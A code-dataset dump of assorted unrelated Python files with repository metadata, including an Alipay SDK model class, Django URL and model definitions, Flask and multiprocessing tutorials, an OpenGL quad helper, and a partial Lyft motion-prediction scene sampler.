d254ebfbaeafdb969c9d4440d84ce4d00f4001b8 | 5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d | /alipay/aop/api/domain/AlipayOfflineProviderIndirectisvActivityEffectModel.py | cac8ed6d796184997fe5f3aa98dbb056ba0bbc8a | [
"Apache-2.0"
] | permissive | alipay/alipay-sdk-python-all | 8bd20882852ffeb70a6e929038bf88ff1d1eff1c | 1fad300587c9e7e099747305ba9077d4cd7afde9 | refs/heads/master | 2023-08-27T21:35:01.778771 | 2023-08-23T07:12:26 | 2023-08-23T07:12:26 | 133,338,689 | 247 | 70 | Apache-2.0 | 2023-04-25T04:54:02 | 2018-05-14T09:40:54 | Python | UTF-8 | Python | false | false | 2,002 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
class AlipayOfflineProviderIndirectisvActivityEffectModel(object):
def __init__(self):
self._effective_time = None
self._ext_info = None
self._merchant_id = None
@property
def effective_time(self):
return self._effective_time
@effective_time.setter
def effective_time(self, value):
self._effective_time = value
@property
def ext_info(self):
return self._ext_info
@ext_info.setter
def ext_info(self, value):
self._ext_info = value
@property
def merchant_id(self):
return self._merchant_id
@merchant_id.setter
def merchant_id(self, value):
self._merchant_id = value
def to_alipay_dict(self):
params = dict()
if self.effective_time:
if hasattr(self.effective_time, 'to_alipay_dict'):
params['effective_time'] = self.effective_time.to_alipay_dict()
else:
params['effective_time'] = self.effective_time
if self.ext_info:
if hasattr(self.ext_info, 'to_alipay_dict'):
params['ext_info'] = self.ext_info.to_alipay_dict()
else:
params['ext_info'] = self.ext_info
if self.merchant_id:
if hasattr(self.merchant_id, 'to_alipay_dict'):
params['merchant_id'] = self.merchant_id.to_alipay_dict()
else:
params['merchant_id'] = self.merchant_id
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayOfflineProviderIndirectisvActivityEffectModel()
if 'effective_time' in d:
o.effective_time = d['effective_time']
if 'ext_info' in d:
o.ext_info = d['ext_info']
if 'merchant_id' in d:
o.merchant_id = d['merchant_id']
return o
| [
"jishupei.jsp@alibaba-inc.com"
] | jishupei.jsp@alibaba-inc.com |
a9595644a256d97d832d311804226c979060f5e6 | 351fa4edb6e904ff1ac83c6a790deaa7676be452 | /misc/maxAreaOfCake/Solution.py | 3facaa570babac01ef0de3db2aefe3661017d523 | [
"MIT"
] | permissive | shahbagdadi/py-algo-n-ds | 42981a61631e1a9af7d5ac73bdc894ac0c2a1586 | f3026631cd9f3c543250ef1e2cfdf2726e0526b8 | refs/heads/master | 2022-11-27T19:13:47.348893 | 2022-11-14T21:58:51 | 2022-11-14T21:58:51 | 246,944,662 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 521 | py | from typing import List
class Solution:
def maxArea(self, h: int, w: int, horizontalCuts: List[int], verticalCuts: List[int]) -> int:
hc , vc = sorted(horizontalCuts) +[h], sorted(verticalCuts) + [w]
mh , p = 0 , 0
for h in hc :
mh = max(mh,h-p)
p = h
mw , p = 0 , 0
for w in vc :
mw = max(mw,w-p)
p = w
return mh * mw
s = Solution()
hc = [1,2,4]
vc = [1,3]
# hc = [3,1]
# vc = [1]
ans = s.maxArea(5,4,hc,vc)
print(ans) | [
"email.shanu@gmail.com"
] | email.shanu@gmail.com |
35289460658e0ee7b729775ed7615e52d9c16be0 | 1525eeb085814724cd2678d1d81871c5c4b6eaee | /urls.py | 9570812ad1ee668bdf30070e089f4461d26c9d29 | [] | no_license | djangorobert/datauploader | b6156b4de7490ae9669ce724f6f727d7b5a68a5c | 381edfc76b293038ccabea134face10f15ec1310 | refs/heads/master | 2020-03-28T07:17:45.135728 | 2018-09-13T15:41:21 | 2018-09-13T15:41:21 | 147,892,502 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | from django.conf.urls import url
from datauploader.views import UploadFileView, SubmissionListView
from datauploader import views
urlpatterns = [
url(r'^upload/$', UploadFileView.as_view(), name='upload'),
url(r'^list/$', SubmissionListView.as_view(), name='list'),
url(r'^(?P<pk>\d+)\$', views.SubmissionDetailView.as_view(), name='detail'),
url(r'^submitted/$', views.submitted, name='submitted'),
] | [
"djangocharm2020@gmail.com"
] | djangocharm2020@gmail.com |
1350572da4d56758a9a53a26cec9c22952a3686a | cecd66e056674fe0e8f83eb24f0f8f076304ef02 | /meidoo/meidoo/apps/payment/models.py | d05bd14d345e128c9c918f07188544b66e2394ce | [
"MIT"
] | permissive | amourbrus/meiduo_mall | 30b2aac92685df5ef119b57cb653ff5f7eabcb3a | 965b3d4685d1a8fe18a3177cc864f27eeb516081 | refs/heads/master | 2020-03-23T17:42:54.552801 | 2018-07-22T09:23:37 | 2018-07-22T09:23:37 | 141,871,772 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 537 | py | from django.db import models
# Create your models here.
from orders.models import OrderInfo
from meidoo.utils.models import BaseModel # check
class Payment(BaseModel):
"""
支付信息
"""
order = models.ForeignKey(OrderInfo, on_delete=models.CASCADE, verbose_name='订单')
trade_id = models.CharField(max_length=100, unique=True, null=True, blank=True, verbose_name="支付编号")
class Meta:
db_table = 'tb_payment'
verbose_name = '支付信息'
verbose_name_plural = verbose_name | [
"2338336776@qq.com"
] | 2338336776@qq.com |
1a8f4c33617b29b06b3d18836ddac3326c605b11 | 09e5cfe06e437989a2ccf2aeecb9c73eb998a36c | /modules/cctbx_project/libtbx/command_line/create_unzipsfx.py | 726675faa9cac376b1054e69d2966926e398a772 | [
"BSD-3-Clause-LBNL",
"BSD-3-Clause"
] | permissive | jorgediazjr/dials-dev20191018 | b81b19653624cee39207b7cefb8dfcb2e99b79eb | 77d66c719b5746f37af51ad593e2941ed6fbba17 | refs/heads/master | 2020-08-21T02:48:54.719532 | 2020-01-25T01:41:37 | 2020-01-25T01:41:37 | 216,089,955 | 0 | 1 | BSD-3-Clause | 2020-01-25T01:41:39 | 2019-10-18T19:03:17 | Python | UTF-8 | Python | false | false | 1,342 | py | from __future__ import absolute_import, division, print_function
import libtbx.path
import sys
buf_size = 1000000
def copy(src, dest):
while True:
buf = src.read(buf_size)
if (buf == ""): break
dest.write(buf)
def find_unzipsfx():
for command in ("unzipsfx_autorun_yes.exe",
"unzipsfx_autorun.exe",
"unzipsfx.exe"):
path_cmd = libtbx.path.full_command_path(
command=command, search_first=["."])
if (path_cmd is not None): return path_cmd
return None
def create(zip_file_name, path_unzipsfx_exe=None):
if (path_unzipsfx_exe is None):
path_unzipsfx_exe = find_unzipsfx()
if (path_unzipsfx_exe is None):
raise RuntimeError("Fatal: unzipsfx executable not found.")
assert zip_file_name.endswith(".zip")
exe_file_name = zip_file_name[:-4] + ".exe"
exe_file = open(exe_file_name, "wb")
copy(open(path_unzipsfx_exe, "rb"), exe_file)
copy(open(zip_file_name, "rb"), exe_file)
exe_file.close()
def run(args):
"usage: libtbx.create_unzipsfx [path_unzipsfx_exe] zip_file_name"
if (not len(args) in (1,2) or "-h" in args or "--help" in args):
print(run.__doc__)
return
if (len(args) == 1):
create(zip_file_name=args[0])
else:
create(zip_file_name=args[1], path_unzipsfx_exe=args[0])
if (__name__ == "__main__"):
run(sys.argv[1:])
| [
"jorge7soccer@gmail.com"
] | jorge7soccer@gmail.com |
a75a6a9fff392c36a2f7ea0a26ceb9742e30b997 | 1a2bf34d7fc1d227ceebf05edf00287de74259c5 | /flask/Day02/fisher.py | 1cc4adb358cfd1bff444552db2490d00e0e84b5b | [] | no_license | lzn9423362/Django- | de69fee75160236e397b3bbc165281eadbe898f0 | 8c1656d20dcc4dfc29fb942b2db54ec07077e3ae | refs/heads/master | 2020-03-29T18:03:47.323734 | 2018-11-28T12:07:12 | 2018-11-28T12:07:12 | 150,192,771 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 592 | py | # 从flask框架中导入Flask这个类
from flask import Flask
#初始化一个flask对象
#需要传递一个参数__name__
# 1.方便flask框架去寻找资源
# 2.方便flask插件比如flask-Sqlalchemy出现错误的时候,好去寻找问题所在的位置
app = Flask(__name__)
@app.route('/')
def hello_world():
return 'hello world'
#如果当前这个文件是作为入口程序运行,那么就执行app.run()
if __name__ == '__main__':
#启动一个应用服务器,来接受用户的请求
app.run(host='0.0.0.0') | [
"411121080@qq.com"
] | 411121080@qq.com |
a813c48c1eaee83257117b19fbeecd6ea97aaf61 | f82757475ea13965581c2147ff57123b361c5d62 | /gi-stubs/repository/Vulkan/DescriptorSetLayoutBinding.py | 0479636cd1074bcea3d9e51d4a14b5da89e17818 | [] | no_license | ttys3/pygobject-stubs | 9b15d1b473db06f47e5ffba5ad0a31d6d1becb57 | d0e6e93399212aada4386d2ce80344eb9a31db48 | refs/heads/master | 2022-09-23T12:58:44.526554 | 2020-06-06T04:15:00 | 2020-06-06T04:15:00 | 269,693,287 | 8 | 2 | null | 2020-06-05T15:57:54 | 2020-06-05T15:57:54 | null | UTF-8 | Python | false | false | 4,259 | py | # encoding: utf-8
# module gi.repository.Vulkan
# from /usr/lib64/girepository-1.0/Vulkan-1.0.typelib
# by generator 1.147
"""
An object which wraps an introspection typelib.
This wrapping creates a python module like representation of the typelib
using gi repository as a foundation. Accessing attributes of the module
will dynamically pull them in and create wrappers for the members.
These members are then cached on this introspection module.
"""
# imports
import gi as __gi
class DescriptorSetLayoutBinding(__gi.Struct):
# no doc
def __delattr__(self, *args, **kwargs): # real signature unknown
""" Implement delattr(self, name). """
pass
def __dir__(self, *args, **kwargs): # real signature unknown
""" Default dir() implementation. """
pass
def __eq__(self, *args, **kwargs): # real signature unknown
""" Return self==value. """
pass
def __format__(self, *args, **kwargs): # real signature unknown
""" Default object formatter. """
pass
def __getattribute__(self, *args, **kwargs): # real signature unknown
""" Return getattr(self, name). """
pass
def __ge__(self, *args, **kwargs): # real signature unknown
""" Return self>=value. """
pass
def __gt__(self, *args, **kwargs): # real signature unknown
""" Return self>value. """
pass
def __hash__(self, *args, **kwargs): # real signature unknown
""" Return hash(self). """
pass
def __init_subclass__(self, *args, **kwargs): # real signature unknown
"""
This method is called when a class is subclassed.
The default implementation does nothing. It may be
overridden to extend subclasses.
"""
pass
def __init__(self, *args, **kwargs): # real signature unknown
pass
def __le__(self, *args, **kwargs): # real signature unknown
""" Return self<=value. """
pass
def __lt__(self, *args, **kwargs): # real signature unknown
""" Return self<value. """
pass
@staticmethod # known case of __new__
def __new__(*args, **kwargs): # real signature unknown
""" Create and return a new object. See help(type) for accurate signature. """
pass
def __ne__(self, *args, **kwargs): # real signature unknown
""" Return self!=value. """
pass
def __reduce_ex__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __reduce__(self, *args, **kwargs): # real signature unknown
""" Helper for pickle. """
pass
def __repr__(self, *args, **kwargs): # real signature unknown
""" Return repr(self). """
pass
def __setattr__(self, *args, **kwargs): # real signature unknown
""" Implement setattr(self, name, value). """
pass
def __sizeof__(self, *args, **kwargs): # real signature unknown
""" Size of object in memory, in bytes. """
pass
def __str__(self, *args, **kwargs): # real signature unknown
""" Return str(self). """
pass
def __subclasshook__(self, *args, **kwargs): # real signature unknown
"""
Abstract classes can override this to customize issubclass().
This is invoked early on by abc.ABCMeta.__subclasscheck__().
It should return True, False or NotImplemented. If it returns
NotImplemented, the normal algorithm is used. Otherwise, it
overrides the normal algorithm (and the outcome is cached).
"""
pass
def __weakref__(self, *args, **kwargs): # real signature unknown
pass
__class__ = None # (!) real value is "<class 'gi.types.StructMeta'>"
__dict__ = None # (!) real value is "mappingproxy({'__info__': StructInfo(DescriptorSetLayoutBinding), '__module__': 'gi.repository.Vulkan', '__gtype__': <GType void (4)>, '__dict__': <attribute '__dict__' of 'DescriptorSetLayoutBinding' objects>, '__weakref__': <attribute '__weakref__' of 'DescriptorSetLayoutBinding' objects>, '__doc__': None})"
__gtype__ = None # (!) real value is '<GType void (4)>'
__info__ = StructInfo(DescriptorSetLayoutBinding)
| [
"ttys3@outlook.com"
] | ttys3@outlook.com |
dc8ac8f98abdd3d2476ff6576232b08b43103914 | b6fc54cff7037f5e4ef26cb4a645d5ea5a6fecdf | /000000stepikProgBasKirFed/Stepik000000ProgBasKirFedсh01p03st06TASK06_20210205_datatypes.py | 117d126123441b6fb42d7d39b655d4b2bc394545 | [
"Apache-2.0"
] | permissive | SafonovMikhail/python_000577 | 5483eaf2f7c73bc619ce1f5de67d8d689d2e7dd4 | f2dccac82a37df430c4eb7425b5d084d83520409 | refs/heads/master | 2022-12-08T10:53:57.202746 | 2022-12-07T09:09:51 | 2022-12-07T09:09:51 | 204,713,341 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 504 | py | '''
Напишите программу, которая считывает две строки и выводит на экран конкатенацию этих строк
Примечание: конкатенация - операция "сложения" двух строк
Sample Input 1:
Язык программирования
Python
Sample Output 1:
Язык программированияPython
Sample Input 2:
37
81
Sample Output 2:
3781
'''
s1, s2 = input(), input()
print(s1 + s2)
| [
"ms33@inbox.ru"
] | ms33@inbox.ru |
6e8ee652e5e7b105b697cf9fdec23a5e025e1dee | 4a9dada02c749e9e5277fe1e35357d7b2b28ad5c | /郝嘉良2018013383/操作系统实验/作业3.py | 44b2f84b1cc0ec63e1941c65a01a64ac57e05c53 | [] | no_license | wanghan79/2020_Option_System | 631cc80f52829390a128a86677de527472470348 | f37b870614edf7d85320da197d932df2f25a5720 | refs/heads/master | 2021-01-09T13:10:05.630685 | 2020-07-10T03:30:39 | 2020-07-10T03:30:39 | 242,312,271 | 13 | 9 | null | 2020-07-04T16:13:11 | 2020-02-22T09:12:56 | Python | UTF-8 | Python | false | false | 4,488 | py | import multiprocessing
import threading
import logging
import time
# 1.多进程实例演示
def hello(i):
print('hello, im', i)
if __name__ == '__main__':
for i in range(10):
p = multiprocessing.Process(target=hello, args=(i,))
p.start()
# 2.多进程自定义进程名称
logging.basicConfig(
level=logging.DEBUG,
format="(%(threadName)-10s) %(message)s",
)
def worker():
name = multiprocessing.current_process().name
logging.debug('%s 开始' % name)
time.sleep(3)
logging.debug('%s 结束' % name)
def my_service():
name = multiprocessing.current_process().name
logging.debug('%s 开始' % name)
time.sleep(3)
logging.debug('%s 结束' % name)
if __name__ == '__main__':
service = multiprocessing.Process(
name='my_service',
target=my_service,
)
worker_1 = multiprocessing.Process(
name='worker_1',
target=worker,
)
worker_2 = multiprocessing.Process(
target=worker,
)
service.start()
worker_1.start()
worker_2.start()
# 3.守护进程无等待的方式
logging.basicConfig(
level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def daemon():
p = multiprocessing.current_process()
logging.debug('%s %s 开始' % (p.name, p.pid))
time.sleep(2)
logging.debug('%s %s 结束' % (p.name, p.pid))
def no_daemon():
p = multiprocessing.current_process()
logging.debug('%s %s 开始' % (p.name, p.pid))
logging.debug('%s %s 结束' % (p.name, p.pid))
if __name__ == '__main__':
daemon_obj = multiprocessing.Process(
target=daemon,
name='daemon'
)
daemon_obj.daemon = True
no_daemon_obj = multiprocessing.Process(
target=no_daemon,
name='no_daemon'
)
no_daemon_obj.daemon = False
daemon_obj.start()
time.sleep(1)
no_daemon_obj.start()
# 4.守护进程设置等待超时时间
logging.basicConfig(
level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def daemon():
p = multiprocessing.current_process()
logging.debug('%s %s 开始' % (p.name, p.pid))
time.sleep(2)
logging.debug('%s %s 结束' % (p.name, p.pid))
def no_daemon():
p = multiprocessing.current_process()
logging.debug('%s %s 开始' % (p.name, p.pid))
logging.debug('%s %s 结束' % (p.name, p.pid))
if __name__ == '__main__':
daemon_obj = multiprocessing.Process(
target=daemon,
name='daemon'
)
daemon_obj.daemon = True
no_daemon_obj = multiprocessing.Process(
target=no_daemon,
name='no_daemon'
)
no_daemon_obj.daemon = False
daemon_obj.start()
time.sleep(1)
no_daemon_obj.start()
daemon_obj.join(1)
logging.debug('daemon_obj.is_alive():%s' % daemon_obj.is_alive())
no_daemon_obj.join()
# 5.进程的终止,注意:terminate的时候,需要使用join()进程,保证进程成功终止
logging.basicConfig(
level=logging.DEBUG,
format='(%(threadName)-10s) %(message)s',
)
def slow_worker():
print('开始工作')
time.sleep(0.1)
print('结束工作')
if __name__ == '__main__':
p = multiprocessing.Process(
target=slow_worker
)
logging.debug('开始之前的状态%s' % p.is_alive())
p.start()
logging.debug('正在运行的状态%s' % p.is_alive())
p.terminate()
logging.debug('调用终止进程的状态%s' % p.is_alive())
p.join()
logging.debug('等待所有进程运行完成,状态%s' % p.is_alive())
# 6.进程退出状态码
def exit_error():
sys.exit(1)
def exit_ok():
return
def return_value():
return 1
def raises():
raise RuntimeError('运行时的错误')
def terminated():
time.sleep(3)
if __name__ == '__main__':
jobs = []
funcs = [
exit_error,
exit_ok,
return_value,
raises,
terminated,
]
for func in funcs:
print('运行进程的函数名 %s' % func.__name__)
j = multiprocessing.Process(
target=func,
name=func.__name__
)
jobs.append(j)
j.start()
jobs[-1].terminate()
for j in jobs:
j.join()
print('{:>15}.exitcode={}'.format(j.name, j.exitcode)) | [
"noreply@github.com"
] | wanghan79.noreply@github.com |
5e5a54d0191082f22946db5b5b2325b7c67c51d2 | 6e86e685d0469f131446c809c1478c8faf27a382 | /jhmanager/repo/users.py | 582b475baddd69a97050511ed92ca6afd4986e97 | [] | no_license | CardinisCode/jobhuntmanager | 551091e35ab30704c42191f3c35b2e91a5f7a704 | 23be1e10bdaaa9d203090fbbd9a44fe0472f8b18 | refs/heads/master | 2023-04-26T06:47:44.726364 | 2021-05-25T13:04:34 | 2021-05-25T13:04:34 | 317,517,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,453 | py | from jhmanager.repo.database import SqlDatabase
from datetime import date, time
from flask import flash
import sqlite3
class User:
def __init__(self, db_fields):
self.user_id = db_fields[0]
self.username = db_fields[1]
self.hash = db_fields[2]
self.email = db_fields[3]
self.date = db_fields[4]
class UserRepository:
def __init__(self, db):
self.db = db
def createUser(self, fields):
cursor = self.db.cursor()
command = """
INSERT INTO users
(username, hash, email, date)
VALUES (?, ?, ?, ?)
"""
result = cursor.execute(command, tuple(fields.values()))
self.db.commit()
return result.lastrowid
def getUserByID(self, user_id):
cursor = self.db.cursor()
result = cursor.execute("SELECT * FROM users WHERE user_id=?", (user_id,))
self.db.commit()
user_result = User(result.fetchone())
return user_result
def getUserByUsername(self, username):
cursor = self.db.cursor()
result = cursor.execute("SELECT * FROM users WHERE username=?", (username,))
self.db.commit()
return result.fetchone()
def getUserByEmail(self, email):
cursor = self.db.cursor()
result = cursor.execute("SELECT * FROM users WHERE email=?", (email,))
self.db.commit()
return result.fetchone()
def updateUserEmailByID(self, fields):
cursor = self.db.cursor()
command = """
UPDATE users
SET email = ?
WHERE user_id = ?
"""
cursor.execute(command, tuple(fields.values()))
self.db.commit()
def updateUserHashByID(self, fields):
cursor = self.db.cursor()
command = """
UPDATE users
SET hash = ?
WHERE user_id = ?
"""
cursor.execute(command, tuple(fields.values()))
self.db.commit()
def deleteUserByID(self, user_id):
message = ""
try:
cursor = self.db.cursor()
command = "DELETE FROM users WHERE user_id = {}".format(user_id)
cursor.execute(command)
self.db.commit()
message = "User details deleted successfully."
except sqlite3.Error as error:
message = "User details failed to delete. " + error
finally:
return message | [
"ac.folgado@gmail.com"
] | ac.folgado@gmail.com |
745e496a4d5f14874c52650c007e52a0330e2f34 | c0613b519124979d1de12614a9a7a745f9c9a66f | /xarray_leaflet/transform.py | 8d1eb0ac19ca7d3304887c784e7dc8a224b59fd8 | [
"MIT"
] | permissive | netgodz/xarray_leaflet | 1cccb67251dd81817c6893f47a55989846d03062 | d4c22781243e8e4900cd43a4479cfc932f68bdcf | refs/heads/master | 2023-07-16T15:15:47.090465 | 2021-08-06T20:16:46 | 2021-08-07T06:20:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,118 | py | import warnings
import numpy as np
import xarray as xr
def passthrough(array, *args, **kwargs):
return array
def normalize(array, *args, **kwargs):
vmin = np.min(array).values
vmax = np.max(array).values
array = (array - vmin) / (vmax - vmin)
return array
def coarsen(agg_func=xr.core.rolling.DataArrayCoarsen.mean):
def _(array, *args, **kwargs):
tile_width = kwargs['tile_width']
tile_height = kwargs['tile_height']
if len(array.shape) > 2:
# it's an RGB array
array_2d = array.isel(rgb=0)
else:
array_2d = array
ny, nx = array_2d.shape
wx = nx // (tile_width * 2)
wy = ny // (tile_height * 2)
dim = {}
if wx > 1:
dim['x'] = wx
if wy > 1:
dim['y'] = wy
array = array.coarsen(**dim, boundary='pad')
# ignore "mean of empty slice" warning in np.nanmean
with warnings.catch_warnings():
warnings.simplefilter("ignore", category=RuntimeWarning)
array = agg_func(array)
return array
return _
| [
"david.brochart@gmail.com"
] | david.brochart@gmail.com |
171345562deab9b5d2ed7d77b42ef9ca9b3a89fe | 9ce3385fb9829b70f191ea9478ebfe2dd4971c80 | /render/imdraw/quad.py | 896bbb74707bf37dfa00d1980753279e53e698b4 | [] | no_license | zalavariandris/editor | f3ffce9ae2bbd70fd9e9ce1b9ce8fc7bb23468a3 | 35b8941af12da58bb190967c28a78c91d5bb43dc | refs/heads/master | 2022-12-18T10:53:24.274321 | 2020-10-01T16:58:17 | 2020-10-01T16:58:17 | 283,721,461 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,952 | py | from OpenGL.GL import *
import numpy as np
from .helpers import buffer_offset
import logging
import functools
@functools.lru_cache(maxsize=128)
def quad_geo():
positions = np.array(
[(-1.0, +1.0, 0.0),
(-1.0, -1.0, 0.0),
(+1.0, +1.0, 0.0),
(+1.0, -1.0, 0.0)],
dtype=np.float32
)
uvs = np.array(
[(0.0, 1.0),
(0.0, 0.0),
(1.0, 1.0),
(1.0, 0.0)],
dtype=np.float32
)
logging.debug("create quad geo")
return positions, uvs
@functools.lru_cache(maxsize=128)
def create_buffer(program):
positions, uvs = quad_geo()
# setup VAO
vao = glGenVertexArrays(1)
pos_vbo, uv_vbo = glGenBuffers(2) # FIXME: use single vbo for positions and vertices
glBindVertexArray(vao)
position_location = glGetAttribLocation(program, 'position')
if position_location >= 0:
glBindBuffer(GL_ARRAY_BUFFER, pos_vbo)
glBufferData(GL_ARRAY_BUFFER, positions.nbytes, positions, GL_STATIC_DRAW)
glVertexAttribPointer(position_location, 3, GL_FLOAT, False, 0, buffer_offset(0))
glEnableVertexAttribArray(position_location)
glBindBuffer(GL_ARRAY_BUFFER, 0)
else:
logging.warning("no 'position' attribute")
uv_location = glGetAttribLocation(program, 'uv')
if uv_location>=0:
glBindBuffer(GL_ARRAY_BUFFER, uv_vbo)
glBufferData(GL_ARRAY_BUFFER, uvs.nbytes, uvs, GL_STATIC_DRAW)
glVertexAttribPointer(uv_location, 2, GL_FLOAT, False, 0, buffer_offset(0))
glEnableVertexAttribArray(uv_location)
glBindBuffer(GL_ARRAY_BUFFER, 0)
else:
logging.warning("no 'uv' attribute")
glBindVertexArray(0)
logging.debug("create quad buffer: {}".format(vao))
return vao
def quad(program):
vao = create_buffer(program)
# draw
glBindVertexArray(vao)
glDrawArrays(GL_TRIANGLE_STRIP, 0, 4)
glBindVertexArray(0)
| [
"zalavariandris@gmail.com"
] | zalavariandris@gmail.com |
0e1aab0283ba37b62180201b79ac72c433de0f15 | 165abb376cc4ead31e9b4d49c1a0f7c917f827ae | /ixc_django_docker/settings/haystack.py | 4dfae42c1548f375d65da4f19fb6a243db1fa4c2 | [] | no_license | ixc/ixc-django-docker | 8a04d0efa1d2ac0610b7c55facc6a210b6b6584d | 2f4302d8dd52ff0d1ad7a6f5973f70bcd808f283 | refs/heads/master | 2023-08-23T10:54:56.399455 | 2023-08-22T03:38:18 | 2023-08-22T03:38:18 | 74,635,795 | 6 | 1 | null | 2021-12-09T05:44:39 | 2016-11-24T03:45:17 | Shell | UTF-8 | Python | false | false | 476 | py | # Get host and port from the environment.
ELASTICSEARCH_ADDRESS = os.environ.get(
'ELASTICSEARCH_ADDRESS', 'localhost:9200')
HAYSTACK_CONNECTIONS = {
'default': {
'ENGINE': 'haystack.backends.elasticsearch2_backend.Elasticsearch2SearchEngine',
'INDEX_NAME': 'haystack-%s' % PROJECT_SLUG,
'URL': 'http://%s/' % ELASTICSEARCH_ADDRESS,
},
}
HAYSTACK_SIGNAL_PROCESSOR = 'haystack.signals.BaseSignalProcessor'
INSTALLED_APPS += ('haystack', )
| [
"real.human@mrmachine.net"
] | real.human@mrmachine.net |
516db0555bf68f2992a2c77c28f9bdf347708d9d | a4e6b080d17611853374577aaecb0367366b39b5 | /glycresoft_sqlalchemy/utils/data_files.py | 9692dd3d26e4eda167b518a3793d1736dbfd05e7 | [] | no_license | mobiusklein/glycresoft_sqlalchemy | 6235b1ea2c8da9ef6b2e725a60f0b6a925f1689d | e0edf12a8d6243cc2438a6236aa0564a28f92a8a | refs/heads/master | 2020-04-06T05:38:35.849225 | 2016-11-21T03:25:26 | 2016-11-21T03:25:26 | 37,537,754 | 0 | 2 | null | 2016-11-21T03:25:27 | 2015-06-16T15:10:45 | Python | UTF-8 | Python | false | false | 2,525 | py | import os
from functools import partial
from .vendor import sqlitedict, appdir
from glycresoft_sqlalchemy.report import colors
from glycresoft_sqlalchemy.structure.data import unimod
dirs = appdir.AppDirs("GlycReSoft", "Zaia Lab", "1.0", roaming=True)
pjoin = os.path.join
data_directory = dirs.user_data_dir
cache_directory = dirs.user_cache_dir
if not os.path.exists(data_directory):
os.makedirs(data_directory)
try:
invalidation_errors = [OSError, WindowsError]
except:
invalidation_errors = [OSError]
class ResourcePath(str):
valid = True
def invalidate(self):
self.valid = False
def validate(self):
if not self.valid:
if self.exists:
self.remove()
def remove(self):
try:
os.remove(self)
except invalidation_errors:
pass
@property
def exists(self):
return os.path.exists(self)
class Resource(object):
def __init__(self, name, path, **kwargs):
self.name = name
self.path = ResourcePath(path)
self.held = kwargs.get('held', False)
self.owners = kwargs.get('owners', set())
self.ready = kwargs.get("ready", False)
def __str__(self):
return self.path
def __repr__(self):
return "Resource(name=%r, path=%r)"
def acquired(self, owner):
if owner not in self.owners:
self.owners.add(owner)
def release(self, owner):
if owner not in self.owners:
raise ValueError("%r is not a valid owner" % owner)
self.owners.remove(owner)
if len(self.owners) == 0:
self.held = False
display_store = ResourcePath(pjoin(data_directory, "display_store.db"))
unimod_store = ResourcePath(pjoin(data_directory, "unimod.db"))
glycomedb_store = ResourcePath(pjoin(data_directory, "glycome-db.db"))
glycomedb_download_cache = ResourcePath(pjoin(data_directory, "glycome-db-download-cache"))
taxonomylite_store = ResourcePath(pjoin(data_directory, "taxonomylite.db"))
def make_absolute_sqlite_sqlalchemy_uri(path):
return "sqlite:///%s" % path
def configure_color_store():
'''Use a disk-based data-store to persist color assignments
'''
color_map = colors._color_mapper.color_name_map
cmap = sqlitedict.open(display_store, "colors", autocommit=True)
cmap.update(color_map)
colors._color_mapper.color_name_map = cmap
configure_color_store()
unimod.load = partial(unimod.load, make_absolute_sqlite_sqlalchemy_uri(unimod_store))
| [
"mobiusklein@gmail.com"
] | mobiusklein@gmail.com |
911c01224778fd2b7f5f5f645eb0716acbf69539 | c3d0a0b6336a3ff73724fe1615eb1809dbdaaed8 | /Extra Lockdown Tasks/Logical_Operators.py | 6b1193d9bf1da442ed977288478970802a3c804f | [] | no_license | Silentsoul04/FTSP_2020 | db0dae6cd9c371f3daa9219f86520dfa66348236 | 7e603af918da2bcfe4949a4cf5a33107c837894f | refs/heads/master | 2022-12-21T20:44:32.031640 | 2020-09-20T12:29:58 | 2020-09-20T12:29:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 687 | py | # Logical Operators in Python :-
# Identity
# Membership
Truth table
and , or , not
x y o/p
0 0 0
0 1 0
1 0 0
1 1 1
ex:-
x = 100
y = 200
print(x<y and y>x)
print(x<y and y<x)
OR Truth Table
x y o/p
0 0 0
0 1 1
1 0 1
1 1 1
Ex :-
x = 1001
y = 200
print(x<y or x>y)
x = True
print(not(x))
EX :-
x = 100
y = 200
print(x<y)
print(not(x<y))
# Identity Operator :-
is , is not
x = 100
#y = 200
y = 100
print(x is y)
print(x is y)
print(id(x))
print(id(y))
x = 100
y = 200
print(x is not y)
print(id(x))
print(id(y))
# Membership Operators :-
in , not in
l1 = [10,20,30,'Python','Surya']
print('Python' in l1)
print(1001 not in l1)
print('Apple' in l1)
| [
"sharma90126@gmail.com"
] | sharma90126@gmail.com |
1db20ad25163c045f050fd3441c29eb62f9bb3d9 | 2a0055c32cb34b48fd3ef705000ce373376d5439 | /src/lib/training/scene_sampler.py | f4bdc5828e958cecb388cd84228d0eef206f8bdc | [
"MIT"
] | permissive | pfnet-research/kaggle-lyft-motion-prediction-4th-place-solution | dc60818b96eea5181b2c923ea60cdacc02dd7187 | 0bc51075db31a747eeebb7f4775a3cd26ad5f870 | refs/heads/master | 2023-01-29T16:30:38.757836 | 2020-12-09T06:18:46 | 2020-12-09T06:18:46 | 319,860,058 | 48 | 10 | null | null | null | null | UTF-8 | Python | false | false | 3,540 | py | import math
import torch
from torch.utils.data import Sampler
import torch.distributed as dist
import numpy as np
def get_valid_starts_and_ends(get_frame_arguments: np.ndarray, min_state_index: int = 0):
get_frame_arguments = get_frame_arguments[:] # put on the memory if the array is zarr
scene_change_points = np.where(np.diff(get_frame_arguments[:, 1], 1) > 0)[0] + 1
starts = np.r_[0, scene_change_points]
ends = np.r_[scene_change_points, len(get_frame_arguments)]
valid_starts, valid_ends = [], []
while len(starts) > 0:
ok = get_frame_arguments[starts, 2] >= min_state_index
valid_starts.append(starts[ok])
valid_ends.append(ends[ok])
starts, ends = starts[~ok], ends[~ok]
starts += 1
ok = starts < ends
starts, ends = starts[ok], ends[ok]
return np.concatenate(valid_starts), np.concatenate(valid_ends)
class SceneSampler(Sampler):
